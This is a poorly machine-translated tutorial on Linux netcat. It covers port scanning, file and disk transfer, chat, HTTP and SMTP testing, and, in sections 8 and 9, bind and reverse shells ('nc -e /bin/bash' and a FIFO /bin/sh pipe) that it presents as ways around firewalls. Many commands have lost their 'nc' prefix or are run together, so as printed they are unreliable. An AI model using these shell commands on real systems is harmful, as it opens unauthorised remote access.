Linux NC Command Usage Collection

The Ps.ubuntu comes with a NETCAT-OPENBSD version with no-c/-e parameters.
PSS. Online markdown Editor Bug What's going on ... the "#" sign still shows

# #参数

Want to connect to a place:nc [-options] hostname port[s] [ports] …
Bind port waits for connection:nc -l port [-options] [hostname] [port]

• -g< Gateway: Set up a router hop communication gateway, set up 8;
• The number of-g<: Set the source route-pointing device, which is a multiple of 4;
• -H: Online help;
• -i< delay seconds;: Set the time interval for transmitting information and scanning the communication port;
• -L: Monitor the incoming data using the listening mode;
• -N: Use the IP address directly, not through the domain name server;
• -o< output file;: Specify the name of the file, the data transmitted by the transfer of 16 binary loadline dumped into the file to save;
• -p< communication port;: Set the communication port used by the local host;
• -r: Specifies the source port and destination port are randomly selected;
• -s<: Set the IP address of the local host to send the packet;
• -U: Using UDP transport protocol;
• -V: Displays the instruction execution process;
• -w< timeout number of seconds;: Set the time to wait for the connection;
• -Z: Use 0 input/output mode, only when scanning communication ports.

# #用法

[A Server (192.168.1.1) B Client (192.168.1.2)]

# # # #0. Connect to a remote host:

192.168.x.x 80

Connect to the TCP80 port of the 192.168.x.x.

To listen on the local host:

$nc -l 80

Listen for the TCP80 port on this machine.

Timeout control:

Most of the time we don't want the connection to remain, so we can use the-w parameter to specify the idle timeout for the connection, which is immediately a numeric value that represents the number of seconds, and the connection is terminated if the connection exceeds the specified time.

Server

$nc -l 2389

Client

$ nc -w 10 localhost 2389

The connection will be interrupted after 10 seconds.
Note: Do not use the-W and-L parameters on the server side, because the-w parameter will have no effect on the server side.

# # # #1. Port scan

Port scans are often used by system administrators and hackers to discover ports that are open on some machines to help them identify vulnerabilities in the system.

192.168.1.1 21-25

Can be run in TCP or UDP mode, by default the Tcp,-u parameter is adjusted to UDP.
The z parameter tells Netcat to use 0 IO, close the connection immediately after the connection is successful, and no data exchange.
The V parameter refers to the verbose output.
The n parameter tells Netcat not to use DNS to reverse-query the domain name of the IP address.
The above command will print 21 to 25 of all open ports.

127.0.0.1 22localhost [127.0.0.1] 22 (ssh) openSSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1.4

"Ssh-2.0-openssh_5.9p1 debian-5ubuntu1.4" is banner information. Banner is a text that banner is a text message sent to you by a service that you connect to. Banner information is useful when you are trying to identify a vulnerability or the type and version of a service. However, not all services will send banner. Once you find an open port, you can easily grab their banner using the NETCAT connection service.

# # # #2. Chat Server

If you want to talk to your friends, there are a lot of software and information services available for you to use. However, if you do not have such extravagant configuration, such as you in the computer lab, all the external connection is limited, how do you and all the friends sitting in the next room all day to communicate that? Don't be depressed, Netcat provides a way for you to create a chat server, a pre-determined port, so that he can reach you.

Server

$nc -l 20000

The Netcat command initiates a TCP server on port 20000, and all standard outputs and inputs are output to that port. Both the output and the input are shown in this shell.

Client

192.168.1.1 20000

Whatever you type on machine B will appear on machine A.

# # # #3. File transfer

Most of the time, we are trying to transfer files over a network or other tool. There are many ways, like FTP,SCP,SMB and so on, but when you just need to transfer files temporarily or once, it's really worth wasting time installing and configuring a software on your machine. Suppose you want to pass a file file.txt from a to B. A or B can be either a server or a client.

Server

$nc -l 20000 < file.txt

Client

192.168.1.1 20000 > file.txt

Here we create a server on a and redirect the input of netcat to file file.txt, then when any successful connection is made to that port, Netcat will send file contents.
At the client we redirect the output to File.txt, when B connects to A,a to send the file contents, B saves the file contents to file.txt.
There is no need to create a file source as a server, and we can use it in the opposite way. Like the following we send files from B to a, but the server is created on a, this time we only need to redirect the output of the netcat and redirect the input file of B.
B as Server

Server

$nc -l 20000 > file.txt

Client

192.168.1.2 20000 < file.txt

# # # #4. Directory transfer

Sending a file is simple, but if we want to send multiple files, or the entire directory, it is as simple as using the compression tool tar, compressed and send the compressed package.
If you want to transfer a directory over the network from A to B.

Server

$tar -cvf – dir_name | nc -l 20000

Client

192.168.1.1 20000 | tar -xvf -

Here on a server, we create a tar archive package and pass it-redirect it in the console, then use the pipeline, redirecting it to Netcat,netcat to send it over the network.
At the client we download the package through the Netcat pipeline and then open the file.
If you want to save bandwidth transfer compression packets, we can use bzip2 or other tools to compress.

Server

$tar -cvf – dir_name| bzip2 -z | nc -l 20000

Compression via BZIP2

Client

$nc -n 192.168.1.1 20000 | bzip2 -d |tar -xvf -

# # # #5. Encrypt the data you send over the network

If you are concerned about the security of your data being sent over the Internet, you can encrypt it with a tool such as mcrypt before sending your data.

Server

$nc localhost 20000 | mcrypt –flush –bare -F -q -d -m ecb > file.txt

Encrypt data using the MCrypt tool.

Client

$mcrypt –flush –bare -F -q -m ecb < file.txt | nc -l 20000

Use the MCrypt tool to decrypt the data.
The above two commands will prompt for a password, ensuring that the same password is used on both ends.
Here we use MCrypt to encrypt, use any other encryption tool can.

# # # #6. Streaming video

While not the best way to generate streaming video, if there are no specific tools on the server, using Netcat, we still have the hope of doing it.

Server

$cat video.avi | nc -l 20000

Here we just read from a video file and redirect the output to the Netcat client

Client

192.168.1.1 20000 | mplayer -vo x11 -cache 3000 -

Here we read the data from the socket and redirect it to MPlayer.

# # # #7, cloning a device

If you have installed a Linux machine and need to repeat the same operation to other machines, and you do not want to repeat the configuration again. Do not need to re-configure the installation process, just start another machine with some boot can drive the disk and clone your machine.
Cloning a Linux PC is simple, assuming your system is on disk/DEV/SDA

Server

$dd if=/dev/sda | nc -l 20000

Client

192.168.1.1 20000 | dd of=/dev/sda

DD is a tool that reads raw data from disk, I redirect its output through the NETCAT server to another machine and writes it to disk, and it copies all of the information along with the partitioned table. But if we have already partitioned and only need to clone the root partition, we can change SDA to sda1,sda2 according to the location of our system root partition. And so on.

# # # #8. Open a shell

We have used remote shell-with telnet and ssh, but if these two commands are not installed and we do not have permission to install them, we can also use Netcat to create a remote shell.
Suppose your netcat supports the-C-E parameter (native netcat)

Server

$nc -l 20000 -e /bin/bash -i

Client

192.168.1.1 20000

Here we have created a NETCAT server and indicated that it was executed when it was successfully connected/bin/bash
If Netcat does not support the-C or-e parameter (OpenBSD netcat), we can still create a remote shell

Server

/tmp/tmp_fifo$cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 20000 > /tmp/tmp_fifo

Here we create a FIFO file and then use the Pipeline command to direct the FIFO file content to the shell 2>&1. is used to redirect standard error output and standard output, and then pipe to Netcat to run on port 20000. At this point, we have redirected the output of Netcat to the FIFO file.
Description
Input received from the network is written to the FIFO file
The Cat command reads the FIFO file and sends its contents to the SH command
The SH command process receives input and writes it back to Netcat.
Netcat send output to client via network
As to why it succeeds because the pipeline executes the command in parallel, the FIFO file is used to replace the normal file because the FIFO makes the read wait and if it is a normal file, the cat command ends as soon as possible and begins to read the empty file.
Simply connect to the server on the client

Client

192.168.1.1 20000

You will get a shell prompt on the client

# # # #9. Reverse shell

A reverse shell is a shell that opens on a client. The reverse shell is named because it differs from other configurations, where the server uses the services provided by the customer.

Server

$nc -l 20000

On the client side, simply tell Netcat to execute the shell after the connection is complete.

Client

$nc 192.168.1.1 20000 -e /bin/bash

Now, what's so special about the reverse shell?
The reverse shell is often used to circumvent firewall restrictions, such as blocking inbound connections. For example, I have a private IP address of 192.168.1.1, and I use a proxy server to connect to the external network. If I want to access this machine from outside the network such as 1.2.3.4 Shell, then I will use the reverse shell for this purpose.

# # # #10. Specify the source port

Suppose your firewall filters all the ports except the 25 port, you need to specify the source port using the-P option.

Server

$nc -l 20000

Client

192.168.1.1 20000 25

Using a port within 1024 requires root access.
This command will open port 25 for communication on the client, otherwise the random port will be used.

# # # #11. Specify the Source address

Suppose your machine has multiple addresses, and you want to explicitly specify which address to use for external data traffic. We can use the-s option in Netcat to specify the IP address.

Server

$nc -u -l 20000 < file.txt

Client

$nc -u 192.168.1.1 20000 -s 172.31.100.5 > file.txt

The command binds the address 172.31.100.5.

# # # #12. Static Web Page Server

Create a new Web page, named somepage.html;
Create a new shell script:

while true; do    nc -l 80 -q 1 < somepage.html;done

Execute with Root, and then enter 127.0.0.1 in the browser to open to see if it works correctly.
NC directives are often used to remove bugs or tests from managers, so it is easier to use Python's Simplehttpserver module if it is simply a Web server that needs to be in a temporary fashion.

# # # #13. Analog HTTP Headers

$NC www.huanxiangwu.com80GET/http/1.1Host:ispconfig.orgreferrer:mypage.comuser-agent:my-browserhttp/1.1OKDate:tue,Dec200807:23:GMTServer:apache/2.2.6 (Unix) dav/2 Mod_mono/1.2.1 mod_python/3.2.8 Python/2.4.3 mod_perl/2.0.2 PERL/V5.8.8set-COOKIE:PHPSESSID=BBADORBVIE1GN037IIH6LRDG50; path=/expires: 0cache-control:no-store, No-cache, Must-revalidate, Post-check=0, Pre-check=0pragma:no-cachecache-control: private, Post-check=0, Pre-check=0, max-age= 0set-cookie:own_sid=xrutay, Expires=tue, 23-dec-2008  07: 23:24 GMT; Path=/Vary: Accept-encodingtransfer-encoding:chunkedcontent-type:text/ html[...]                

After the NC command, enter the contents of the Red section and press ENTER two times to get the HTTP headers content from the other side.

# # # #13. Netcat Support IPV6

The Netcat-4 and 6 parameters are used to specify the IP address type, respectively, IPV4 and IPV6:

Server

-l 2389

Client

$ nc -4 localhost 2389

Then we can use the Netstat command to view the network situation:

2389tcp        0      0 localhost:2389 localhost:50851 ESTABLISHEDtcp 0 0 localhost:50851 localhost:2389 ESTABLISHED

Next we look at the IPV6:

Server

-l 2389

Client

$ nc -6 localhost 2389

Run the netstat command again:

2389tcp6       0      0 localhost:2389 localhost:33234 ESTABLISHEDtcp6 0 0 localhost:33234 localhost:2389 ESTABLISHED

The prefix is TCP6, which indicates that the address used is IPv6.

# # # #14. Prohibit reading data from standard input in Netcat

This feature uses the-d parameter, see the following example:

Server

-l 2389

Client

-d localhost 2389Hi

The Hi text you entered will not be sent to the server side.

# # # #15. Force Netcat server-side hold-up status

If the client connecting to the server disconnects, the server side also exits.

Server

-l 2389

Client

$ nc localhost 2389^C

Server

-l 2389$

In the above example, the server side also exits immediately when the client disconnects.
We can use the-K parameter to control that the server does not exit because the client disconnects.

Server

-l 2389

Client

$ nc localhost 2389^C

Server

-l 2389

# # # #16. Configuring the Netcat client does not exit because of EOF

The Netcat client can use the-Q parameter to control how long it takes to exit after EOF is received, in seconds:

Client

$nc  -q 5  localhost 2389

Now if the client receives EOF, it waits 5 seconds to exit.

# # # #17. Mobile use SMTP to send a letter

When testing an email server, you can use this method to send your email:

25 << EOFHELO host.example.comMAIL FROM: <user@host.example.com>RCPT TO: <user2@host.example.com>DATABody of email..QUITEOF

# # # #18. Via Proxy Server

This command uses the 10.2.3.4:8080 proxy server, which connects to the port of Host.example.com 42.

$nc -x10.2.3.4:8080 -Xconnect host.example.com 42

# # # #19. Using Unix Domain sockets

This line of instructions will create a Unix Domain Socket and receive the information:

$nc -lU /var/tmp/dsocket

Linux NC Command Usage Collection